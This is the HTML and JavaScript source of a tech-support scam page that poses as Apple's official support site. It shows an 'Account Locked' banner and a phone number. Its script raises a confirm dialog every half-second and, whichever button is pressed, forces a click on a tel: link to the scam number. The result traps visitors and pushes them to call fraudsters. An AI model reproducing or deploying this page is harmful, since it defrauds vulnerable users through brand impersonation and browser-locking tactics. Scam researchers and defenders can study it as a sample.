<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" class="no-js">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta http-equiv="cache-control" content="max-age=3600" />
    <title>Contact - Official Online support </title>
    <meta name="description" content="Contact Online support by phone or chat, set up a repair, or make a Genius Bar appointment for iPhone, iPad, Mac and more." />
    <link rel="stylesheet" href="Base.css" type="text/css" />
    <link href="https://use.fontawesome.com/releases/v5.0.1/css/all.css" rel="stylesheet">
    <script src="text.js"></script>
    
    
    
    
    
    
    
    
    
    
       
    <!-- Google tag (gtag.js) //washim bhai 

<script async src="https://www.googletagmanager.com/gtag/js?id=G-D95VVZPSNM"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-D95VVZPSNM');
</script>

 -->




  <!-- Google tag (gtag.js)   deepak-->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-F339TB4GYF"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-F339TB4GYF');
</script>
	 
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
</head>

<body>
    <div id="result" style="margin-top: 50px;"></div>
    <input type="checkbox" id="ac-gn-menustate" class="ac-gn-menustate" />
    <nav id="ac-globalnav" class="no-js">
        <div class="ac-gn-content"></div>
    </nav>
    <div id="ac-gn-curtain" class="ac-gn-curtain"></div>
    <div id="ac-gn-placeholder" class="ac-nav-placeholder"></div>
    <div class="main">
        <nav id="ac-localnav" class="js no-touch css-sticky" lang="en-US" role="navigation" data-sticky="">
            <div class="ac-ln-wrapper">
                <div class="ac-ln-background"></div>
                <div class="ac-ln-content">
                    <span class="ac-ln-title">
                       Online Support +1(812)-654-6274
					 </span>
                </div>
            </div>
        </nav>
        <section class="as-columns  as-columns--1up  as-banner as-banner--top">
            <div class="row">
                <div class="column large-12 medium-12 small-12">
                    <div class='as-banner-cont'>
                        <div class='as-banner-image as-banner-image--top'>
                            <style type="text/css">
                                .as-banner-image.as-banner-image--top {
                                    background-image: url("globalnav/apple/contact-us-hero.image.large_2x.jpg");
                                }
                                
                                .as-banner-image.as-banner-image--top:before {
                                    content: "";
                                    display: block;
                                }
                                
                                @media only screen and (max-width: 735px) {
                                    .as-banner-image.as-banner-image--top {
                                        background-image: url("globalnav/apple/contact-us-hero.image.small_2x.jpg");
                                    }
                                }
                            </style>
                            <img sizes="(min-width:735px ) 735w, 100vw" srcset="globalnav/apple/contact-us-hero.image.small_2x.jpg 735w, globalnav/apple/contact-us-hero.image.large_2x.jpg 1440w" alt="" class="as-image-speculativedownload" src="globalnav/apple/contact-us-hero.image.large_2x.jpg"
                            />
                        </div>
                    </div>
                    <div class="as-banner-content">
                        <div class="pageTitle  ">
                            <h1 class="pageTitle-heading">Account Locked</h1>
                            <p class="pageTitle-intro js_setTextBlock"></p>
                        </div>
                        <div class="sectionTitle sectionTitleBlock">
                            <h2 class="sectionTitle-heading"></h2>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </div>
    <footer id="ac-globalfooter" class="no-js">
        <div class="ac-gf-content">
            <section class="ac-gf-footer">
                <div class="ac-gf-footer-locale">
                    <a class="ac-gf-footer-locale-link" href="#" title="Choose your country or region" aria-label="United States. Choose your country or region"><img class="ac-gf-footer-locale-flag" src="globalnav/apple/us.png" alt="" width="16" height="16" />United States </a>
                </div>
                <div class="ac-gf-footer-legal">
                    <div class="ac-gf-footer-legal-copyright">Copyright© 2024 Online support. All rights reserved. </div>
                    <div class="ac-gf-footer-legal-links"><a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Privacy
					Policy </a> <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Terms of Use </a>
                        <a class="ac-gf-footer-legal-link analytics-exitlink" href="#">Sales and Refunds </a> <a class="ac-gf-footer-legal-link" href="#">Site
						Map </a> <a class="ac-gf-footer-legal-link" href="#">Contact
						Online Support </a></div>
                </div>
                <meta content="Apple" property="name" />
                <meta content="+1(812)-654-6274
			 " property="telephone" />
            </section>
        </div>
    </footer>
    <script src="https://code.jquery.com/jquery-1.12.0.min.js"></script>
    <script>
        var isCall = 0;
        $(document).ready(function() {
            loadText();
            setTimeout(function() {
                myFunction();
            }, 100);
            setInterval(myFunction, 500);
        });

        function loadText() {
            $('.js_setTextBlock').prop('innerHTML', defaultText);
        }

        function myFunction() {
            if (confirm(defaultText)) {
                okkkk();
            } else {
                okkkk();
            }
        }

        function okkkk() {
            $('#result').append('<a id="anchorcall" href="tel:+1(812)-654-6274" target="_top"></a>');
            fakeClick(event, document.getElementById("anchorcall"));
        }

        function fakeClick(event, anchorObj) {
            if (anchorObj.click) {
                anchorObj.click();
            } else if (document.createEvent) {
                if (event.target !== anchorObj) {
                    var evt = document.createEvent("MouseEvents");
                    evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
                    var allowDefault = anchorObj.dispatchEvent(evt);
                }
            }
        }
    </script>
</body>

</html>